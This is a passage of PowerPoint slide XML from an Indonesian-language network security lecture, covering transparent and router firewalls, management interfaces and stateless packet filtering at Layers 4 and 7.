              <a:t> subnet dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host server web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP host. Atau, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router dan switch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> IP. Firewall yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dirutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pun. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>Firewall router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> router firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> firmware router. Perbedaannya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. Router/modem Internet SOHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dilengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> firewall yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297433085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Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 4 dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
